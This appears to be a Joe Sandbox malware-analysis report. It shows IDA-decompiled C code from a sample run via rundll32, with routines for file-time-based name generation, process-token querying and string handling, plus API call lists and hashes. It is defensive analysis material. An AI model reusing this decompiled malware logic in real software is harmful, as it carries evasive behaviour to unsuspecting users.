                                          C-Code - Quality: 50%
                                          			E04C04C3A(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x4c0d324; // 0x55895b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x4c0d324; // 0x55895b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x4c0d030) {
					HeapFree( *0x4c0d238, 0, _t8);
				}
				_t14[1] = E04C07C75(_v0, _t14);
				_t11 =  *0x4c0d324; // 0x55895b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                          0x04c04c3a
                                          0x04c04c3a
                                          0x04c04c43
                                          0x04c04c53
                                          0x04c04c53
                                          0x04c04c58
                                          0x04c04c5d
                                          0x00000000
                                          0x00000000
                                          0x04c04c4d
                                          0x04c04c4d
                                          0x04c04c5f
                                          0x04c04c63
                                          0x04c04c75
                                          0x04c04c75
                                          0x04c04c85
                                          0x04c04c88
                                          0x04c04c8d
                                          0x04c04c91
                                          0x04c04c97

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(05589570), ref: 04C04C43
                                          • Sleep.KERNEL32(0000000A,?,?,?,04C04A8B,?,?,?,4D283A53,?,?), ref: 04C04C4D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,04C04A8B,?,?,?,4D283A53,?,?), ref: 04C04C75
                                          • RtlLeaveCriticalSection.NTDLL(05589570), ref: 04C04C91
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 7e0777259e141b7e99e1fa3f31ff1eafb542fce37bc15cf597562e70172fcd40
                                          • Instruction ID: df866c34205f3cc936767a4f39d8d745082887b8530c0493b5a818b9568bdfc2
                                          • Opcode Fuzzy Hash: 7e0777259e141b7e99e1fa3f31ff1eafb542fce37bc15cf597562e70172fcd40
                                          • Instruction Fuzzy Hash: 63F0FE786002409BE7189FA8EA88F1677E9EF14748B06C604F647D7290D728FE80DB19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C09B10, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E04C09B10() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x4c0d324; // 0x55895b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x4c0d324; // 0x55895b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x4c0d324; // 0x55895b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x4c0e845) {
					HeapFree( *0x4c0d238, 0, _t10);
					_t7 =  *0x4c0d324; // 0x55895b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                          0x04c09b10
                                          0x04c09b19
                                          0x04c09b29
                                          0x04c09b29
                                          0x04c09b2e
                                          0x04c09b33
                                          0x00000000
                                          0x00000000
                                          0x04c09b23
                                          0x04c09b23
                                          0x04c09b35
                                          0x04c09b3a
                                          0x04c09b3e
                                          0x04c09b51
                                          0x04c09b57
                                          0x04c09b57
                                          0x04c09b60
                                          0x04c09b62
                                          0x04c09b66
                                          0x04c09b6c

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(05589570), ref: 04C09B19
                                          • Sleep.KERNEL32(0000000A,?,?,?,04C04A8B,?,?,?,4D283A53,?,?), ref: 04C09B23
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04C04A8B,?,?,?,4D283A53,?,?), ref: 04C09B51
                                          • RtlLeaveCriticalSection.NTDLL(05589570), ref: 04C09B66
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 85e0e8592a0a65d7eb36ab8f80baf3d41c90a1b684cc332c60bcc19df5629fec
                                          • Instruction ID: 8d6e70cce43b079abf6dfdd85cac70c051e7aa02c18e2f938b9e496eeaed29e9
                                          • Opcode Fuzzy Hash: 85e0e8592a0a65d7eb36ab8f80baf3d41c90a1b684cc332c60bcc19df5629fec
                                          • Instruction Fuzzy Hash: 3BF0DAB86002009BEB288F94D999F2537F6EB18714F068108FA03D7291C638EC80CA11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C06B6E, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04C06B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04C058BE(_t2);
				if(_t34 != 0) {
					_t30 = E04C058BE(_t28);
					if(_t30 == 0) {
						E04C0147E(_t34);
					} else {
						_t39 = _a4;
						_t22 = E04C0A8D2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E04C0A8D2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                          0x04c06b6e
                                          0x04c06b78
                                          0x04c06b7a
                                          0x04c06b80
                                          0x04c06b80
                                          0x04c06b89
                                          0x04c06b8d
                                          0x04c06b99
                                          0x04c06b9d
                                          0x04c06c11
                                          0x04c06b9f
                                          0x04c06b9f
                                          0x04c06ba3
                                          0x04c06ba8
                                          0x04c06bad
                                          0x04c06bc7
                                          0x04c06bb6
                                          0x04c06bb6
                                          0x04c06bba
                                          0x04c06bbd
                                          0x04c06bc2
                                          0x04c06bc2
                                          0x04c06bcc
                                          0x04c06bf4
                                          0x04c06bfa
                                          0x04c06bfd
                                          0x04c06bce
                                          0x04c06bd0
                                          0x04c06bd8
                                          0x04c06be3
                                          0x04c06be8
                                          0x04c06be8
                                          0x04c06c04
                                          0x04c06c0b
                                          0x04c06c0c
                                          0x04c06c0c
                                          0x04c06b9d
                                          0x04c06c1c

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04C0A006,?,?,?,?,00000102,04C066AF,?,?,00000000), ref: 04C06B7A
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                            • Part of subcall function 04C0A8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04C06BA8,00000000,00000001,00000001,?,?,04C0A006,?,?,?,?,00000102), ref: 04C0A8E0
                                            • Part of subcall function 04C0A8D2: StrChrA.SHLWAPI(?,0000003F,?,?,04C0A006,?,?,?,?,00000102,04C066AF,?,?,00000000,00000000), ref: 04C0A8EA
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04C0A006,?,?,?,?,00000102,04C066AF,?), ref: 04C06BD8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04C06BE8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04C06BF4
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: 85ce4b1ff7ef7b23a66edde901bcfe0f80c53b280e1f400711d3d03f9a376b7b
                                          • Instruction ID: 2d66f26dc0883cbbe3e184b88d095d239c615cade640ebd02f6b3a61b179cc00
                                          • Opcode Fuzzy Hash: 85ce4b1ff7ef7b23a66edde901bcfe0f80c53b280e1f400711d3d03f9a376b7b
                                          • Instruction Fuzzy Hash: CA21D5B1A04255BFDB115FB4C844A9A7FAADF06394F05C150F9049B241DB35EA50EBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C05FCB, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04C05FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04C058BE(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                          0x04c05fe0
                                          0x04c05fe4
                                          0x04c05fee
                                          0x04c05ff3
                                          0x04c05ff8
                                          0x04c05ffa
                                          0x04c06002
                                          0x04c06007
                                          0x04c06015
                                          0x04c0601a
                                          0x04c06024

                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,0558937C,?,04C0694E,004F0053,0558937C,?,?,?,?,?,?,04C09C10), ref: 04C05FDB
                                          • lstrlenW.KERNEL32(04C0694E,?,04C0694E,004F0053,0558937C,?,?,?,?,?,?,04C09C10), ref: 04C05FE2
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,04C0694E,004F0053,0558937C,?,?,?,?,?,?,04C09C10), ref: 04C06002
                                          • memcpy.NTDLL(751469A0,04C0694E,00000002,00000000,004F0053,751469A0,?,?,04C0694E,004F0053,0558937C), ref: 04C06015
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: ca6ffaf1435e000b7c9e49da1d9a29214585ba19b71da30f2100b42f1b7bfed6
                                          • Instruction ID: 602b2d56b68ce24df4f3aba18a95580c7d5052e23b5a37631f37120f5885ad28
                                          • Opcode Fuzzy Hash: ca6ffaf1435e000b7c9e49da1d9a29214585ba19b71da30f2100b42f1b7bfed6
                                          • Instruction Fuzzy Hash: 2FF03776900118BB9B11EFA8CC89C9F7BADEF082987058062AA04D7201E735EA10DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C09DEF, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,04C05335,616D692F,00000000), ref: 04C09DFB
                                          • lstrlen.KERNEL32(?), ref: 04C09E03
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04C09E1A
                                          • lstrcat.KERNEL32(00000000,?), ref: 04C09E25
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: a560ccc3d906dcfa3ac16e7e4a1e17039a9e556f20bf1d72073c06381ee296e0
                                          • Instruction ID: 110a6ba6d3010aa89de51b6bf884c1121898ff16ea184e11ef607d12130fbe73
                                          • Opcode Fuzzy Hash: a560ccc3d906dcfa3ac16e7e4a1e17039a9e556f20bf1d72073c06381ee296e0
                                          • Instruction Fuzzy Hash: 6AE04837805621BB87226BA4AC08D8FBFADFF89354B054A15F65093114C735DD15DFD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: rundll32.exe PID: 6536 Parent PID: 2880 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 043532BA, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E043532BA(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x435d2a0; // 0x59935a40
				_t74 = RtlAllocateHeap( *0x435d238, 0, _t72 ^ 0x59935b44);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x435d2a0; // 0x59935a40
				_t78 = RtlAllocateHeap( *0x435d238, 0, _t76 ^ 0x59935a4d);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x435d238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x435d2a0; // 0x59935a40
				memset(_t78, 0, _t136 ^ 0x59935a4d);
				_t81 =  *0x435d2a4; // 0x251a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x435e7e8; // 0x73797325
				_t83 = E043577E6(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x435d238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x59935a4d;
				_v28.dwHighDateTime = 0x59935a4d;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x59935a4d) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x435d2a4; // 0x251a5a8
				_t16 = _t93 + 0x435e809; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                          0x043532c3
                                          0x043532c9
                                          0x043532cb
                                          0x043532e5
                                          0x043532e7
                                          0x043532ec
                                          0x04353561
                                          0x04353568
                                          0x04353568
                                          0x043532f2
                                          0x04353307
                                          0x04353309
                                          0x0435330b
                                          0x04353310
                                          0x04353551
                                          0x0435355b
                                          0x00000000
                                          0x0435355b
                                          0x04353316
                                          0x04353321
                                          0x04353326
                                          0x0435332b
                                          0x0435332e
                                          0x04353335
                                          0x0435333a
                                          0x0435333f
                                          0x04353541
                                          0x0435354b
                                          0x00000000
                                          0x0435354b
                                          0x04353355
                                          0x04353359
                                          0x0435335c
                                          0x0435335f
                                          0x04353365
                                          0x0435336a
                                          0x04353373
                                          0x04353379
                                          0x04353383
                                          0x0435338a
                                          0x0435338a
                                          0x0435339c
                                          0x043533a7
                                          0x043533b5
                                          0x043533ba
                                          0x043533bf
                                          0x043533c2
                                          0x043533c7
                                          0x043533d1
                                          0x043533d4
                                          0x043533d7
                                          0x043533ed
                                          0x043533ef
                                          0x043533f4
                                          0x0435353f
                                          0x00000000
                                          0x0435353f
                                          0x0435340b
                                          0x0435345c
                                          0x0435341f
                                          0x04353427
                                          0x0435342c
                                          0x0435343a
                                          0x04353443
                                          0x0435344c
                                          0x0435344c
                                          0x0435345a
                                          0x0435345a
                                          0x04353460
                                          0x04353464
                                          0x04353464
                                          0x0435346a
                                          0x00000000
                                          0x00000000
                                          0x0435346c
                                          0x04353472
                                          0x04353519
                                          0x0435351c
                                          0x04353529
                                          0x04353529
                                          0x0435352d
                                          0x00000000
                                          0x00000000
                                          0x04353522
                                          0x04353526
                                          0x04353526
                                          0x04353528
                                          0x04353528
                                          0x04353532
                                          0x04353539
                                          0x0435353b
                                          0x00000000
                                          0x0435353b
                                          0x04353478
                                          0x0435347a
                                          0x0435347a
                                          0x0435348d
                                          0x04353493
                                          0x0435349e
                                          0x043534a0
                                          0x043534a4
                                          0x043534a6
                                          0x043534a6
                                          0x043534ab
                                          0x043534ad
                                          0x043534ad
                                          0x043534ab
                                          0x043534b2
                                          0x043534b6
                                          0x043534b6
                                          0x043534c6
                                          0x043534cb
                                          0x043534ce
                                          0x043534ce
                                          0x043534d1
                                          0x043534db
                                          0x043534e3
                                          0x043534e8
                                          0x043534f6
                                          0x043534f6
                                          0x0435350a
                                          0x0435350e
                                          0x0435350e

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 043532E5
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04353307
                                          • memset.NTDLL ref: 04353321
                                            • Part of subcall function 043577E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,0435333A,73797325), ref: 043577F7
                                            • Part of subcall function 043577E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04357811
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 0435335F
                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04353373
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 0435338A
                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04353396
                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 043533D7
                                          • FindFirstFileA.KERNEL32(?,?), ref: 043533ED
                                          • CompareFileTime.KERNEL32(?,?), ref: 0435340B
                                          • FindNextFileA.KERNELBASE(0435207E,?), ref: 0435341F
                                          • FindClose.KERNEL32(0435207E), ref: 0435342C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04353438
                                          • CompareFileTime.KERNEL32(?,?), ref: 0435345A
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 0435348D
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 043534C6
                                          • FindNextFileA.KERNELBASE(0435207E,?), ref: 043534DB
                                          • FindClose.KERNEL32(0435207E), ref: 043534E8
                                          • FindFirstFileA.KERNEL32(?,?), ref: 043534F4
                                          • CompareFileTime.KERNEL32(?,?), ref: 04353504
                                          • FindClose.KERNEL32(0435207E), ref: 04353539
                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 0435354B
                                          • HeapFree.KERNEL32(00000000,?), ref: 0435355B
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                          • String ID:
                                          • API String ID: 2944988578-0
                                          • Opcode ID: ccc42fe7643169529cbbcdecee49158a8b02de5638ea0ff42bbddb3b3b67593c
                                          • Instruction ID: dd23ca521cc5b80bcd2a273c12e8c029be3f98a28a56d628d8176efb0b3f9a70
                                          • Opcode Fuzzy Hash: ccc42fe7643169529cbbcdecee49158a8b02de5638ea0ff42bbddb3b3b67593c
                                          • Instruction Fuzzy Hash: 19813BB1900219AFDB119FA5DC84EFEBBBDEF48344F106469E905E7260E774AA44CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043571B9, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 38%
                                          			E043571B9(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E043558BE(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E0435147E(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                          0x043571c6
                                          0x043571c7
                                          0x043571c8
                                          0x043571c9
                                          0x043571ca
                                          0x043571ce
                                          0x043571d5
                                          0x043571e4
                                          0x043571e7
                                          0x043571ea
                                          0x043571f1
                                          0x043571f4
                                          0x043571f7
                                          0x043571fa
                                          0x043571fd
                                          0x04357208
                                          0x0435720a
                                          0x04357213
                                          0x0435721b
                                          0x0435721d
                                          0x0435722f
                                          0x04357239
                                          0x0435723d
                                          0x0435724c
                                          0x04357250
                                          0x04357259
                                          0x04357261
                                          0x04357261
                                          0x04357263
                                          0x04357263
                                          0x0435726b
                                          0x04357271
                                          0x04357275
                                          0x04357275
                                          0x04357280

                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04357200
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04357213
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0435722F
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0435724C
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 04357259
                                          • NtClose.NTDLL(?), ref: 0435726B
                                          • NtClose.NTDLL(00000000), ref: 04357275
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 43fa5107b341fc34192910a4d5687dff2ee164e7a244a1dfc204e7705568ac55
                                          • Instruction ID: 1c25380cc7d9005fc71e45f3928d436a0e51f2c279a1cd4d587fb8a75cdb38bf
                                          • Opcode Fuzzy Hash: 43fa5107b341fc34192910a4d5687dff2ee164e7a244a1dfc204e7705568ac55
                                          • Instruction Fuzzy Hash: 0C2105B2900218BBDB01AF95DC85EDEBFBDEF08744F105022FA00F6120D7719B409BA0
